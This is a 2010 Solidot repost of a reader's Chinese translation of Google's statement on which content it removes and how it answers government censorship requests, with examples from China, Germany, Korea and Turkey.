Google解释参与/不参与哪些审查

来源:http://it.solidot.org/article.pl?sid=10/04/20/1345251&from=rss

stranger 写道 "Google最近发表了一篇文章,解释参与/不参与哪些审查。这是翻译(水平有限,请指出错误):两年半以前,我们概述了我们从Google产品和服务上移除内容的政策。我们的政策从那以来没有改变,但最近我们决定停止在google.cn上内容审查引起了新的关于我们移除内容以及我们如何回应政府的审查请求的问题。所以,现在是时候我们进一步补充它了。
互联网审查是一个日益严重的问题。根据开放网络行动组织(Open Net Initiative),从2002年以来,进行互联网审查的政府数量从4个增长到40个。事实上,一些政府在内容到达他们的公民前就封锁它。即使善意,也可能导致真实的审查。专制政权建造防火墙并打压互联网异议――严厉打击违反规定的人。

增长的政府互联网审查无疑是由于上网人数越来越多,他们比以往创建更多的信息。例如,每天每分钟都有超过24小时的视频被上传到YouTube。这对于曾 经控制传统印刷媒体和播放媒体的政府是一项巨大挑战。与此同时,任何人都同意限制某些信息在互联网上的允许――例如儿童色情――很多新政府规定不仅打击了 开放互联网的心,也违背了《世界人权宣言》第十九条:"人人有权享有主张和发表意见的自由;此项权利包括持有主张而不受干涉的自由,和通过任何媒介和不论国界寻求、接受和传递消息和思想的自由。 "

我们看到了对此挑战的很多方式。中国是最极端的例子,但不仅仅是它。Google产品――从搜索到Blogger再到YouTube和Google Docs――被我们提供服务的100个国家中25个封锁。此外,我们也经常受到政府从我们所有的网站限制和移除内容的请求。当我们接到这些请求,我们审视 哪些内容,尽可能地让它们和服法律,如果我们认为那过于宽泛,我们试图尽量缩小范围。如果可能,向我们的用户对哪些内容被请求屏蔽或移除透明化,以让他们 明白没有得到完整的内容。

在我们自己的服务上,我们以不同的方式处理有争议的内容,这取决于产品。作为一个起点,我们区分搜索(我们只是链接到其他网页)、我们的托管和广告。概括地说,这里是我们的政策:

我们对搜索限制最少,因为搜索结果反映了互联网上的内容。在通常情况下,我们不全域性移除结果,除非儿童色情、一些向侵权信 息、垃圾信息、恶意软件和包含敏感例如信用卡号码的个人资料。明确地说,我们不想进行政治审查。这一点尤其在像中国和越南尽管公民可以挑战审查命令而没有 民主进程的国家。我们仔细评估是否或进入一些可能进行政治审查的国家。

一些欧洲和其他地方民主选举产生政府有一个国家法令禁止某些类型的内容――例如,像在德国和法国亲纳粹的非法材料――只从沃恩的当地搜索引擎(例如德国的www.google.de

我们也遵守一些国家的年轻人保护法像德国移除某些被认为是儿童不宜的链接,我们在韩国也这样做。当我们移除内容,我们对用户显示一个信息:根据当地法律,某数量的结果被移除,我们也向chillingeffects.org,由伯克曼互联网与社会中心(Berkman Center for Internet and Society)运作的一个跟踪网上言论限制的项目报告这些被移除的内容。

像Blogger、YouTube和Picasa网络相册这些我们托管的平台,拥有哪些内容允许,哪些不允许的政策概述。一个我们不允许的很好的例子是仇恨言论。我们政策在这些我们自己托管平台的上移除的内容比在Google搜索上移除的多。Blogger,作为一个最单纯的表达平台,属于开放的服务,允许合法的色情,只要它与Blogger内容政策规定相符。YouTube,作为一个以允许共享、评论和用户互动为旨的社区,有自己的社区准则定义自己的审查规定。例如色情是绝对不在YouTube上被允许的。

我们尽可能地使用户更容易地举报违反我们政策的内容。这是一个视频解释举报如何在YouTube上工作。我们每天24小时都在复查我们服务上被举报的内 容。除非当地法律禁止某些内容,我们将禁止进入那些国家。例如,在土耳其,冒犯现代土耳其的创建人穆斯塔法・基马尔(Mustafa Ataturk),是不合法的。两年前,我们通知了这些在YouTube上的内容并且在土耳其屏蔽了这些违反土耳其法律的视频。一个土耳其法庭随后要求我 们在全球屏蔽那个视频,我们拒绝那样做,认为土耳其法律不适用于土耳其意外。结果YouTube一直在那里被封锁。

最后,我们的广告产品拥有最严格的政策,因为它们的目的是为了创收的商业产品。

这些政策总是不断变化的。决定在我们的服务和产品上允许,限制还是移除,内容,往往需要复杂的判断。
我们有坚定的勇气关于行动处理方法的权利,无论这是关于我们自己的政策条款或者在某种程度上抵抗政府的请求。最后,我们信任,原则是第一位的。

我们以前说过,但在这特别具有挑战性的时候,他们能重复:我们有偏爱人民自由表达的权利。我们相信:更多信息意味着更所选择,更多自由和最终个人拥有更多的权力。"